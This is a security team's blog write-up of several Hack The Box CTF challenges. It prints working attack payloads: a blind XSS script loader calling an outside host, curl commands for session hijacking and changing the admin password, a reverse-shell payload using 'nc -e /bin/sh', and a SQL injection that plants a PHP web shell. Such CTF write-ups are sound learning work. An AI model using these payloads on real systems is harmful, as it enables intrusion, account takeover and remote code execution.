Hack The Box Cyber Apocalypse

Posted May 24, 2022 by Austin Lee ‐ 8 min read

LifeOmic's security team competes in these challenges casually, with a focus on learning and improvement.

Our team started off picking away at some of the low hanging fruit then we began to dig into a few interesting challenges that will be highlighted below.

kryptos-support

The challenge description reads “The secret vault used by the Longhir’s planet council, Kryptos, contains some very sensitive state secrets that Virgil and Ramona are after to prove the injustice performed by the commission. Ulysses performed an initial recon at their request and found a support portal for the vault. Can you take a look if you can infiltrate this system?”

After launching the docker image and accessing the instance we land on a page that shows a text window where a user can send a support message. We also discovered a login page located at /login.

Screen Shot 2022-05-26 at 4 33 55 PM

Basic SQL injection payloads on the login page like ' OR 1=1 -- did not yield any fruit. Next we moved onto some enumeration, but after running tools like SQLmap, OWASP Zap, and dirbuster we still came up empty handed and without a clear direction to head next. From some further enumeration we discovered that if you add Cookie: session=<base64 encoded {"username":"admin"} the 302 Redirect will change to /logout instead of just /.

Since we seemingly had ran out of options we opted to try some blind XSS, submitting a payload similar to this <script>$.getScript("//lifeomic.xss.ht")</script> and after a little bit we got a hit! The XSS was able to run and provide us with a session cookie of another user.

Screen Shot 2022-05-26 at 4 44 55 PM

We now had our next clue and started working towards session hijacking and found that this payload curl --cookie 'session=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Im1vZGVyYXRvciIsInVpZCI6MTAwLCJpYXQiOjE2NTI3NjAxODR9.2_ka4Bt4Tt05OBBLJDqdJ5tPxtsSWDp1pKSkVHlj6og' 'http://188.166.172.138:32079/tickets allows us to hijack the session as user moderator and view submitted support tickets.

Now that we were in the system we seemed to have hit another dead end, there wasn’t anything of value in the tickets, so there must be another step remaining. After a little more searching we discovered the ability to update passwords and noted that the UID for the moderator user was 100.

Screen Shot 2022-05-26 at 4 50 28 PM

We attempted to update another users password, and using an educated guess that UID 1 may be admin that was our first target. We crafted this payload and successfully were able to update the admin’s password. curl -H 'Content-Type: application/json' -d '{"password":"foo", "uid":"1"}' --cookie 'session=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Im1vZGVyYXRvciIsInVpZCI6MTAwLCJpYXQiOjE2NTI3NjAxODR9.2_ka4Bt4Tt05OBBLJDqdJ5tPxtsSWDp1pKSkVHlj6og' 'http://188.166.172.138:32079/api/users/update' {"message":"Password for admin changed successfully!"}

Returning to the login page that was discovered at the start of the challenge we were then able to login as admin and discovered the flag, +300 points for the team!

Screen Shot 2022-05-26 at 4 54 22 PM

andriod-in-the-middle

The description for this challenge reads “Years have passed since Miyuki rescued you from the graveyard. When Virgil tells you that he needs your help with something he found there, desperate thoughts about your father and the disabilities you developed due to the disposal process come to mind. The device looks like an advanced GPS with AI capabilities. Riddled with questions about the past, you are pessimistic that you could be of any value. After hours of fiddling and observing the power traces of this strange device, you and Virgil manage to connect to the debugging interface and write an interpreter to control the signals. The protocol looks familiar to you. Your father always talked about implementing this scheme in devices for security reasons. Could it have been him?”

This challenge is playing with encryption. While looking at the source code provided we can see that the server will generate a public key for itself and tell us what it is. Next it will prompt us to submit our own public key, and then we are expected to submit an encrypted string to get the flag back.

Our team wrote the following python code to solve the challenge:

import random
from Crypto.Cipher import AES
from Crypto.Util.number import long_to_bytes
import hashlib
from source import g, p
import binascii

c = random.randrange(2, p - 1)
C = pow(g, c, p)

M = 0

shared_secret = pow(M, c, p)

key = hashlib.md5(long_to_bytes(shared_secret)).digest()

cipher = AES.new(key, AES.MODE_ECB)
data = b"Initialization Sequence - Code 0"
message = cipher.encrypt(data)

cipher = AES.new(key, AES.MODE_ECB)
message2 = cipher.decrypt(message)

print(binascii.hexlify(message))
print(message2)

Running it returns our flag:

➜  ~ nc 46.101.27.51 30850
DEBUG MSG - Generating The Global DH Parameters
DEBUG MSG - g = 2, p = 10177459997049772558637057109490700048394574760284564283959324525695097805837401714582821820424475480057537817583807249627119267268524840254542683041588432363128111683358536204391767254517057859973149680238170237977230020947732558089671785239121778309357814575486749623687357688511361367822815452806637006568922401890961240475060822815400430220536180181951862931844638638933951683988349468373510128406899660648258602475728913837826845743111489145006566908004165703542907243208106044538037004824530893555918497937074663828069774495573109072469750423175863678445547058247156187317168731446722852098571735569138516533993
DEBUG MSG - Calculation Complete

DEBUG MSG - Generating The Public Key of CPU...
DEBUG MSG - Calculation Complete
DEBUG MSG - Public Key is: ???

Enter The Public Key of The Memory: 0

DEBUG MSG - The CPU Calculates The Shared Secret
DEBUG MSG - Calculation Complete

Enter The Encrypted Initialization Sequence: 1af761314a07bf79f31aeb53bc9e1335e1749e1142b326d82a3c29ac37a042bf

DEBUG MSG - Reseting The Protocol With The New Shared Key
DEBUG MSG - HTB{7h15_p2070c0l_15_pr0tec73d_8y_D@nb3er_c0pyr1gh7_1aws}%

amidst-us

The description for this challenge reads “The AmidstUs tribe is a notorious group of sleeper agents for hire. We have plausible reasons to believe they are working with Draeger, so we have to take action to uncover their identities. Ulysses and bonnie have infiltrated their HQ and came across this mysterious portal on one of the unlocked computers. Can you hack into it despite the low visibility and get them access?”

After spinning up this challenge it takes us to a dark webpage that lights up as we move the mouse around the screen.

Screen Shot 2022-05-26 at 5 07 41 PM

We found out that if you click on the UFO it allows for image upload. While poking the image functionality we found that there aren’t very good checks on what is being uploaded and by intercepting the request and sending the following payload it allows us to obtain a reverse shell.

POST /api/alphafy HTTP/1.1
Host: 123.123.123.123:32225
Content-Length: 188
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Content-Type: application/json
Accept: */*
Origin: http://123.123.123.123:32225
Referer: http://123.123.123.123:32225/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

{"image":"iVBORw0KGgoAAAANSUhEUgAAAAEAAAABAQMAAAAl21bKAAAAA1BMVEUAAACnej3aAAAAAXRSTlMAQObYZgAAAApJREFUCNdjYAAAAAIAAeIhvDMAAAAASUVORK5CYII=","background":["exec(\"__import__('os').system('nc 123.123.123.123 5550 -e /bin/sh')\")",255,255]

Exploring the file system led us to the flag: HTB{i_slept_my_way_to_rce}.

through-fire-n-gates

This is a hardware challenge and it provides us with a circuit file. After spending some time on it we were able to get all of the circuits in the green by adding buttons, but still no indication of a flag.

Screen Shot 2022-05-27 at 7 53 56 AM

Call it intuition or a lucky guess but our team then noticed that there are groups of 1/0 nodes circled together, and there just happens to be eight nodes in each circle. Perhaps they represent ASCII characters? We started working on translating the gates from binary to ASCII and got this string as the output UO...ê~e.M_7h3_g4t3}. The end looks like a flag so we figured that was the right path, after a little bit of troubleshooting the circuits we were able to fix them and produce the whole flag to solve the challenge: HTB{L0st_1n_7h3_g4t3}

the-intergalactic-post

This challenge lands us on a webpage where we can submit an email to sign up for the intergalactic post newsletter. Due to the name of the challenge and basic webpage we suspected another challenge vulnerable to injection, after running some basic payloads we didn’t see any signs of vulnerability.

Screen Shot 2022-05-27 at 8 00 10 AM

We are also provided the source code, so lets take a look at that and see if we can identify the attack vector. It’s a PHP app with a SQLite backend, and appears to be vulnerable to SQL injection through this INSERT statement via the X-Forwarded-For header.

Screen Shot 2022-05-27 at 8 08 06 AM Screen Shot 2022-05-27 at 8 09 55 AM

We injected a basic payload: ',''); SELECT 1; -- into the header, sent it off, and got a successful response back. Great! Now we know SQL is likely our attack vector, but the flag is located at /flag.txt on disk and not in the database so how do we get to it from our injection? Doing some research we discovered that you can use .import to import a file into the database. We created a new table and tried to import the flag but were unsuccessful PHP message: PHP Warning: SQLite3::exec(): near &quot;.&quot;: syntax error in /www/Database.php on line 36" while reading response header from upstream, it seems like .import is not available in exec so we would need to find another way.

Our team did some more noodling and then crafted this payload that can access the flag without having to use any . commands. We are able to attach a .php file as a database, create a table in that new database, and then cat the flag into the new database we have created.

ATTACH DATABASE '/www/a.php' AS i;
CREATE TABLE a.t (c TEXT);
INSERT INTO a.t (c) VALUES ('<?php system("cat /flag*"); ?>');

These commands ran successfully through our injection header, so now all we needed to do was navigate to our new file at /a.php in the browser and we got the flag.

Screen Shot 2022-05-27 at 8 21 42 AM

By the end of the competition our team was able to complete 12 challenges which put us in the top 5% ranking out of around 7,000 teams that competed. While we didn’t set out to win or finish in a high ranking we were pleased to have done so well. We learnt some new tricks, had a ton of fun, and look forward to competing in future CTF’s.

Screen Shot 2022-05-27 at 8 54 25 AM